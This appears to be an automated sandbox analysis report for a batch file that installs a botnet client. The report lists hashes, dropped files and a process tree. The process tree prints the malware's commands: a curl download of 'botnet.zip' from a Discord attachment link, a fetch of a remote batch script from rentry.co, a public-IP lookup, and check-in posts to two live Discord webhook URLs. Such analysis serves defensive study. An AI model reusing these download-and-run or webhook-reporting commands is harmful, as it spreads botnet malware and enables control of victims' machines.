ad80a704ac0ce9868279a0a3d4e85a2582aff13a9e24a0b46478800fa341b260

Analysis

max time kernel
1793s
max time network
1513s
platform
windows10-2004_x64
resource
win10v2004-20230703-en
resource tags

arch:x64arch:x86image:win10v2004-20230703-enlocale:en-usos:windows10-2004-x64system
submitted
17/08/2023, 22:12

Sharing

Copy URL Twitter E-mail

Report Analysis Logs

General

Target

2.bat
Size

779B
MD5

f80b95d6836f18d936105783c4e2c186
SHA1

b95ee9d9ea1d9df6d5dc16ffb400f34a497823a6
SHA256

ad80a704ac0ce9868279a0a3d4e85a2582aff13a9e24a0b46478800fa341b260
SHA512

c50803b213cda537b254633ad48c70bff055b04fdb99829e898d2c7626a24d018709b35dc92f1e89b217f9bb6efafbd2e5074a32e307a89830b8453b4bee1291

Score

7^/10

Malware Config

Signatures

Executes dropped EXE 1 IoCs

pid	Process
3364	forvmbox.exe

Unexpected DNS network traffic destination 3 IoCs

Network traffic to other servers than the configured DNS servers was detected on the DNS port.

description	ioc
Destination IP	208.67.222.222
Destination IP	208.67.222.222
Destination IP	208.67.222.222

Legitimate hosting services abused for malware hosting/C2 1 TTPs

Web Service
T1102

Drops file in System32 directory 3 IoCs

description	ioc	Process
File created	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\InstallService\{D8D5D306-4EC3-4A7E-B284-D44042DCE449}.catalogItem	svchost.exe
File created	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\InstallAgent\Checkpoints\9NCBCSZSJRSB.dat	svchost.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\InstallAgent\Checkpoints\9NCBCSZSJRSB.dat	svchost.exe

Suspicious behavior: EnumeratesProcesses 2 IoCs

pid	Process
4964	powershell.exe
4964	powershell.exe

Suspicious use of AdjustPrivilegeToken 2 IoCs

description	pid	Process
Token: SeDebugPrivilege	4964	powershell.exe
Token: SeManageVolumePrivilege	1068	svchost.exe

Suspicious use of WriteProcessMemory 21 IoCs

description	pid	Process	procid_target
PID 2632 wrote to memory of 2060	2632	cmd.exe	81
PID 2632 wrote to memory of 2060	2632	cmd.exe	81
PID 2632 wrote to memory of 4964	2632	cmd.exe	86
PID 2632 wrote to memory of 4964	2632	cmd.exe	86
PID 2632 wrote to memory of 3364	2632	cmd.exe	94
PID 2632 wrote to memory of 3364	2632	cmd.exe	94
PID 2632 wrote to memory of 3364	2632	cmd.exe	94
PID 2632 wrote to memory of 4880	2632	cmd.exe	95
PID 2632 wrote to memory of 4880	2632	cmd.exe	95
PID 4880 wrote to memory of 4424	4880	cmd.exe	96
PID 4880 wrote to memory of 4424	4880	cmd.exe	96
PID 4880 wrote to memory of 4784	4880	cmd.exe	97
PID 4880 wrote to memory of 4784	4880	cmd.exe	97
PID 3364 wrote to memory of 2608	3364	forvmbox.exe	99
PID 3364 wrote to memory of 2608	3364	forvmbox.exe	99
PID 2608 wrote to memory of 4936	2608	cmd.exe	100
PID 2608 wrote to memory of 4936	2608	cmd.exe	100
PID 2608 wrote to memory of 2484	2608	cmd.exe	101
PID 2608 wrote to memory of 2484	2608	cmd.exe	101
PID 2632 wrote to memory of 2976	2632	cmd.exe	102
PID 2632 wrote to memory of 2976	2632	cmd.exe	102

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\2.bat"
1⤵
- Suspicious use of WriteProcessMemory
PID:2632
- C:\Windows\system32\curl.exe
  curl -o botnet.zip https://cdn.discordapp.com/attachments/1134556559578517677/1141848588612276304/botney.zip
  2⤵
  PID:2060
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -Command "Expand-Archive -Path 'botnet.zip' -DestinationPath 'C:\Users\Admin\Desktop'"
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:4964
- C:\Users\Admin\Desktop\forvmbox.exe
  forvmbox.exe
  2⤵
  - Executes dropped EXE
  - Suspicious use of WriteProcessMemory
  PID:3364
- - C:\Windows\system32\cmd.exe
    "C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\D060.tmp\D061.tmp\D062.bat C:\Users\Admin\Desktop\forvmbox.exe"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2608
  - - C:\Windows\system32\curl.exe
      curl -s -o op.bat https://rentry.co/nfago/raw
      4⤵
      PID:4936
  - - C:\Windows\system32\curl.exe
      curl -i -H "Accept: application/json" -H "Content-Type:application/json" -X POST --data "{\"content\": null, \"embeds\": [{\"title\": \"Attack :=: 14:01:28.55 {}\", \"description\": \" Mon 07/03/2023-14:01:28.55 / \",\"color\": 1127128,\"author\": {\"name\": \"MLBOT BOTNET API LOG\",\"icon_url\": \"https://cdn.discordapp.com/attachments/353651119685107714/1078725179850637372/danger_death_head_internet_security_skull_virus_icon_127111.png\"}}],\"attachments\": []}" https://discord.com/api/webhooks/1140675610524532868/T1taUTk6bStR2J1f9uoXFj7PQAMLD1T1yXMewAm481PLreURT2PLhzfvxpkEb4JO9VJy
      4⤵
      PID:2484
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c nslookup myip.opendns.com. resolver1.opendns.com 2>NUL|find "Address:"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:4880
- - C:\Windows\system32\nslookup.exe
    nslookup myip.opendns.com. resolver1.opendns.com
    3⤵
    PID:4424
- - C:\Windows\system32\find.exe
    find "Address:"
    3⤵
    PID:4784
- C:\Windows\system32\curl.exe
  curl -i -H "Accept: application/json" -H "Content-Type:application/json" -X POST --data "{\"content\": \"[14:01:29.29] BOT Connected to the api's 154.61.71.13 \"}" https://discord.com/api/webhooks/1141840454330105917/dGa5gB8zDsRzxNpVez5OmLDjZnr2_jzCfygyYMftB6oCA8y-GKwqp3YhQ74-MJAzkbJe
  2⤵
  PID:2976

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netsvcs -p
1⤵
- Drops file in System32 directory
PID:1504

C:\Windows\system32\rundll32.exe
"C:\Windows\system32\rundll32.exe" "C:\Windows\SYSTEM32\EDGEHTML.dll",#141 Microsoft.VCLibs.140.00_8wekyb3d8bbwe
1⤵
PID:1296

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k UnistackSvcGroup
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:1068

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Lateral Movement

Collection

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Comms\UnistoreDB\store.jfm

Filesize
16KB

MD5
a82b96b07445829e3331e5e93da8be72

SHA1
62f04c260e59f7a2689a6fac0ead99152d6c9a3d

SHA256
cd40b3020c0088b1e6ab09a31876f9b41d7e1a11adad10cd70174963aa3db1bc

SHA512
a3601fadd9d7e3482402ad8305d4d6fb64d15e0a10415fe742d2b957fe26a5d9ba33f52263d3784aa9f1e04d639db6da46eca0e87dad10eabf986fe4eb90e2e8

Download Submit
C:\Users\Admin\AppData\Local\Temp\D060.tmp\D061.tmp\D062.bat

Filesize
3KB

MD5
d5f935d0b2ddc1212f762ebe21bcb2ae

SHA1
59a320dce6123484a146bcdeac43277b39ca03cb

SHA256
7a68493dbb79471fc0fa27ab7f57380d199fff07c881588c72819426c5c740d7

SHA512
14864ebedaa6c1a6773dc768d9d5d3ed7f102d2aaaa6f09f32f5ee9a75ab738a256ca686c7b3e2f3b65e632610bff6e8cc26da10732b2546863cb94ec84fb76d

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_eczwoapo.mkw.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\wsu45D1.tmp

Filesize
14KB

MD5
c01eaa0bdcd7c30a42bbb35a9acbf574

SHA1
0aee3e1b873e41d040f1991819d0027b6cc68f54

SHA256
32297224427103aa1834dba276bf5d49cd5dd6bda0291422e47ad0d0706c6d40

SHA512
d26ff775ad39425933cd3df92209faa53ec5b701e65bfbcccc64ce8dd3e79f619a9bad7cc975a98a95f2006ae89e50551877fc315a3050e48d5ab89e0802e2b7

Download Submit
C:\Users\Admin\Desktop\attacks\methods\https.exe

Filesize
35.9MB

MD5
70228b5cd219e39ddf20122c56b3866f

SHA1
c3120ad1ca629d707a7220963ad2326c2b096f37

SHA256
a5538de4385e4c1869e63cd3094e8d43efbae23377c153d9ef9ff772f169cfb5

SHA512
bae73c538df3d574451963942048e639f8a1811e0498fd741dc23510dc0702ba5f6553381e81947e9da45059c8b2eda8db75e03dba54dea486c8c87c29a50654

Download Submit
C:\Users\Admin\Desktop\attacks\methods\tlsv\.git\logs\refs\remotes\origin\HEAD

Filesize
186B

MD5
bfd3d0748ac3a838d224d452d6d5959f

SHA1
9506c3eba5b8fa602290a75597e2ef720767c5d6

SHA256
84ec21b7d8415b974e444e6e230a68a934719a7da452eb0f21ff4ff716e13ba5

SHA512
bef9d23bf2a0a5811c51684e933dba127f817a8dc4b7a0deedbc53af9beb64ab245dfa722b94f10defcbe311b448a6e593173639adb4069d076104ad6848a680

Download Submit
C:\Users\Admin\Desktop\botnet.zip

Filesize
102.2MB

MD5
85b96d8fc5082fcdfa23e010bf0e09b1

SHA1
0dc1081497ba72a3ed819a15ad5d5cd3e881d0ab

SHA256
48e93dc99bc3464f3a7c1e9ca1b35084b267baf5087986360e711e65266e4d23

SHA512
c3688c7e3135c81278c4952bf61aec38ef399f993ffb60d8939fe1e47d9b9adb54f87d14239beb98405d7d63378abfa075a906728c57de7f1dc52c27eea50789

Download Submit
C:\Users\Admin\Desktop\forvmbox.exe

Filesize
92KB

MD5
8c661213d9bbfb8a9a3d42c6b6cb7059

SHA1
9f795650dfbac6f49896026b047d16f3a0c16ec9

SHA256
3a02fcf8821a21bafcdc5273eccce353036dd48ffd5c5f91a1d47e5a9fa243ce

SHA512
d21b5b738857535c6eb181636ab78c08d872d33b5b18dff50ab694f6d1afe335db321767720a0a5ab056c3c03e98195dd4086f7eb8e21abf25ff3c0ac75bf0d4

Download Submit
C:\Users\Admin\Desktop\forvmbox.exe

Filesize
92KB

MD5
8c661213d9bbfb8a9a3d42c6b6cb7059

SHA1
9f795650dfbac6f49896026b047d16f3a0c16ec9

SHA256
3a02fcf8821a21bafcdc5273eccce353036dd48ffd5c5f91a1d47e5a9fa243ce

SHA512
d21b5b738857535c6eb181636ab78c08d872d33b5b18dff50ab694f6d1afe335db321767720a0a5ab056c3c03e98195dd4086f7eb8e21abf25ff3c0ac75bf0d4

Download Submit
C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\InstallAgent\Checkpoints\9NCBCSZSJRSB.dat

Filesize
29KB

MD5
d3b99c5c21fb09b79c295356c407f009

SHA1
cdc1c7c81c893f9e6ca41c9d0352c4a9028be44f

SHA256
e38e49be80d0efb3414f8794b8f74dd5aae95761a7899403c5889018a8c7e9d2

SHA512
adcd56d2060ff4a74d40e1b9e72a410d7e5299fcd688293ca3a87da92ef6b385e07a08097dab100789ecf1d400516e05b87ac0ba847ca54aa081dc102e45312f

Download Submit
C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\InstallAgent\Checkpoints\9NCBCSZSJRSB.dat

Filesize
29KB

MD5
85bfc4cf6b8f37513fd931c8ee02b297

SHA1
6851cf7e66414b0aca66d4246a53302fe9ae104f

SHA256
d93d590f73f76c900fd623710f62ec73cfc40bccc832ce8d7bdebdf543303fc3

SHA512
c13d8efed4b5565b53a67fa82f653a38ecd9cc8a1680bc2b28482b32e442baaedb0fb7025fe7b6f5bf00fd9f5c3c04c9212cab99d88d5c604b6d1cf32a31c073

Download Submit
C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\InstallAgent\Checkpoints\9NCBCSZSJRSB.dat

Filesize
29KB

MD5
776481e2a8e5dd3500512d5728745b03

SHA1
36e35ae2d4aa0e4d5ba196cb4c0596fb0c330151

SHA256
50ba978c4e2b5c9d9d52578fbbb9ff97af9f3847c7f57c88e7ecba344a166aa4

SHA512
910012ced78d9bc7cce75c8ff8cb74ccf799cb21b698dda0bbca590a0bb51a874af64af70edf92b05c200fad77c4036783094248b55e816276ccdbb60022fba7

Download Submit
C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\InstallAgent\Checkpoints\9NCBCSZSJRSB.dat

Filesize
29KB

MD5
f2ffd071370a3b944acd64aeb1d7a76a

SHA1
0b13dbc1700c208f41c79290941bcec1684bd6d4

SHA256
af053690cd2e8477bbe529033c3368885a856598e0638ea6873a087cb20ce751

SHA512
ef11298a304059d09408e496f216bb9c1f10312b4912a1bcc9afe09f95edfa0064a5e263b72c2adeec56d7f78d8f6f0457d744889d6533fe9bf7ff7cd69ec94f

Download Submit
C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\InstallAgent\Checkpoints\9NCBCSZSJRSB.dat

Filesize
29KB

MD5
0b6469d280f8da872a0cd4653238d0d3

SHA1
99679c0358d79853eedad93401184820b6daca9b

SHA256
8e55f2f00cb80f47f35435aa316523518786a403eb05511813b328c0d2cec65f

SHA512
d09eef1dc65ed8b3192ebaf6fbeb4e52481d31de1ea54e9ae95ecf133f6b53f04a9ea1c213ffe52a5cf6fa6867f398071609992e9e4a25907432ba267b044375

Download Submit
C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\InstallAgent\Checkpoints\9NCBCSZSJRSB.dat

Filesize
29KB

MD5
f4581dcd4ceccfb82b3667f5350fd6ec

SHA1
0a9ff9edbc23f72ff4428a29d17b513b58617b2f

SHA256
1364e57975b91bc3bcb4a52c743327cb30e30abb4965d04c22801aec161c00a5

SHA512
f389eda6dab9d2f7271f5e43dc373f582a01bc167da2cba7b4e1e00ad417ded6f07d9239449188ec0ee2bc2eaf251530e198d36dbf252f2ba35de678569e6c31

Download Submit
memory/1068-492-0x000001667E830000-0x000001667E831000-memory.dmp

Filesize
4KB

Download
memory/1068-502-0x000001667E460000-0x000001667E461000-memory.dmp

Filesize
4KB

Download
memory/1068-524-0x000001667E6B0000-0x000001667E6B1000-memory.dmp

Filesize
4KB

Download
memory/1068-523-0x000001667E5A0000-0x000001667E5A1000-memory.dmp

Filesize
4KB

Download
memory/1068-522-0x000001667E5A0000-0x000001667E5A1000-memory.dmp

Filesize
4KB

Download
memory/1068-520-0x000001667E590000-0x000001667E591000-memory.dmp

Filesize
4KB

Download
memory/1068-508-0x000001667E390000-0x000001667E391000-memory.dmp

Filesize
4KB

Download
memory/1068-505-0x000001667E450000-0x000001667E451000-memory.dmp

Filesize
4KB

Download
memory/1068-500-0x000001667E450000-0x000001667E451000-memory.dmp

Filesize
4KB

Download
memory/1068-499-0x000001667E460000-0x000001667E461000-memory.dmp

Filesize
4KB

Download
memory/1068-466-0x000001667E240000-0x000001667E250000-memory.dmp

Filesize
64KB

Download
memory/1068-482-0x000001667E810000-0x000001667E811000-memory.dmp

Filesize
4KB

Download
memory/1068-483-0x000001667E830000-0x000001667E831000-memory.dmp

Filesize
4KB

Download
memory/1068-484-0x000001667E830000-0x000001667E831000-memory.dmp

Filesize
4KB

Download
memory/1068-485-0x000001667E830000-0x000001667E831000-memory.dmp

Filesize
4KB

Download
memory/1068-486-0x000001667E830000-0x000001667E831000-memory.dmp

Filesize
4KB

Download
memory/1068-487-0x000001667E830000-0x000001667E831000-memory.dmp

Filesize
4KB

Download
memory/1068-488-0x000001667E830000-0x000001667E831000-memory.dmp

Filesize
4KB

Download
memory/1068-489-0x000001667E830000-0x000001667E831000-memory.dmp

Filesize
4KB

Download
memory/1068-490-0x000001667E830000-0x000001667E831000-memory.dmp

Filesize
4KB

Download
memory/1068-491-0x000001667E830000-0x000001667E831000-memory.dmp

Filesize
4KB

Download
memory/4964-145-0x000002792D960000-0x000002792D970000-memory.dmp

Filesize
64KB

Download
memory/4964-144-0x00007FF8251A0000-0x00007FF825C61000-memory.dmp

Filesize
10.8MB

Download
memory/4964-146-0x000002792D960000-0x000002792D970000-memory.dmp

Filesize
64KB

Download
memory/4964-147-0x000002792D960000-0x000002792D970000-memory.dmp

Filesize
64KB

Download
memory/4964-286-0x00007FF8251A0000-0x00007FF825C61000-memory.dmp

Filesize
10.8MB

Download
memory/4964-148-0x0000027948010000-0x0000027948022000-memory.dmp

Filesize
72KB

Download
memory/4964-149-0x0000027948000000-0x000002794800A000-memory.dmp

Filesize
40KB

Download
memory/4964-140-0x0000027947F80000-0x0000027947FA2000-memory.dmp

Filesize
136KB

Download
memory/4964-177-0x00007FF8251A0000-0x00007FF825C61000-memory.dmp

Filesize
10.8MB

Download
memory/4964-180-0x000002792D960000-0x000002792D970000-memory.dmp

Filesize
64KB

Download
memory/4964-181-0x000002792D960000-0x000002792D970000-memory.dmp

Filesize
64KB

Download
memory/4964-188-0x000002792D960000-0x000002792D970000-memory.dmp

Filesize
64KB

Download